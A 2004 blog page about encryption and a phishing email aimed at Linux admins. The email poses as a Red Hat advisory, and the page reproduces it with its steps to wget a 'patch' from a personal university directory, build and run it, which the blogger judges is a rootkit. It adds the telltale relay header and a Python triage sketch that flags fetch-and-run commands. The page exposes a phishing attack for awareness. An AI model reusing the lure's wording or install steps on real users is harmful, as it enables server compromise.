Sun, 13 Nov 2005

A Meme That Isn't A Waste of Your Time

Sven-S. Porst challenged me to talk about email encryption (PGP, S/MIME, or something), and to suggest to 5 others that they do the same… I realize that you aren’t all Mac folk, but it’s reasonably straightforward in Thunderbird, Outlook, Evolution, and several other mailers, so hopefully you’ll give it a whirl.

First, if you’re using Apple Mail, there’s a really friendly guide to getting it set up. Otherwise, the Wikipedia entries for S/MIME and PGP might be worth checking.

:: 21:19

Sat, 23 Oct 2004

Redhat Phish

Looks like phishers are even going after sysadmins. Very interesting… I got the following email last night, sent to my webmaster account:



Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

  • First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
  • Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
  • cd fileutils-1.0.6.patch
  • make
  • ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.


Very credible looking, except for a few little niggles:

  • Note that the “patch” (almost certainly a rootkit) is linked to an individual user’s (“joeio”) account
  • I seriously doubt that Redhat would be relaying through a random machine in Taiwan:
    Received: from mail.forcartex.com.tw (unknown [211.22.18.59]) by samantha.freeke.org (Postfix) with ESMTP id A355FFC7C39 for daddy@freeke.org; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)

Anyway, I thought this was notable — I’ve seen phishes like this targeted at Windows users, but this is the first I’ve seen specifically targeting ’nix admins. One would assume that they just collected a bunch of webmaster addresses, figuring (probably correctly) that a fair number of those boxes would be running Redhat. The email shows an attention to detail -- the HTML links to Redhat's real logo, linked from a Redhat server, and they even ran their HTML through Tidy!

Let's be careful out there!
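
The two tells listed above (a download hosted in a personal `~user` directory, and a relay host unrelated to the claimed sender) can be checked mechanically. The sketch below is an added example, not part of the original post; the `From` and `Subject` headers and the `triage` function are assumptions, since the post shows only the `Received` header and the message body.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: the Received header and the shell steps are quoted from
# the post; the From and Subject headers are assumptions (the post omits them).
SAMPLE = """\
Received: from mail.forcartex.com.tw (unknown [211.22.18.59])
\tby samantha.freeke.org (Postfix) with ESMTP id A355FFC7C39
\tfor <daddy@freeke.org>; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)
From: RedHat Security Team <security@redhat.com>
Subject: RedHat: critical fileutils update

First download the patch from the Stanford RedHat mirror:
wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
tar zxvf fileutils-1.0.6.patch.tar.gz
cd fileutils-1.0.6.patch
make
./inst
"""

RECEIVED_FROM = re.compile(r"from\s+(\S+)\s+\((\S+)\s+\[([0-9a-fA-F.:]+)\]\)")
USER_DIR_URL = re.compile(r"(?:https?://)?([\w.-]+\.[a-z]{2,})/~([\w.-]+)/\S*", re.I)
FETCH = re.compile(r"^\s*(?:wget|curl)\b", re.I | re.M)
RUN = re.compile(r"^\s*(?:make\b|\./\S+|sh\s|bash\s)", re.I | re.M)

def triage(raw):
    """Return a list of findings; heuristics for a human reviewer, not a verdict."""
    msg = message_from_string(raw)
    findings = []
    sender_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    # The topmost Received header is written by our own MTA, so it is the one
    # hop the sender cannot forge. Outsourced mail also trips this check.
    hop = RECEIVED_FROM.search(msg.get("Received", ""))
    if hop and sender_domain:
        helo, rdns, ip = hop.groups()
        if not (helo.lower() == sender_domain or helo.lower().endswith("." + sender_domain)):
            findings.append(f"relay {helo} [{ip}] (rDNS {rdns}) is outside {sender_domain}")
    body = msg.get_payload()
    for host, user in USER_DIR_URL.findall(body):
        findings.append(f"download from personal web space ~{user} on {host}")
    if FETCH.search(body) and RUN.search(body):
        findings.append("mail asks the reader to fetch and run code")
    return findings

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print("FLAG:", finding)
```
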

:: 23:55



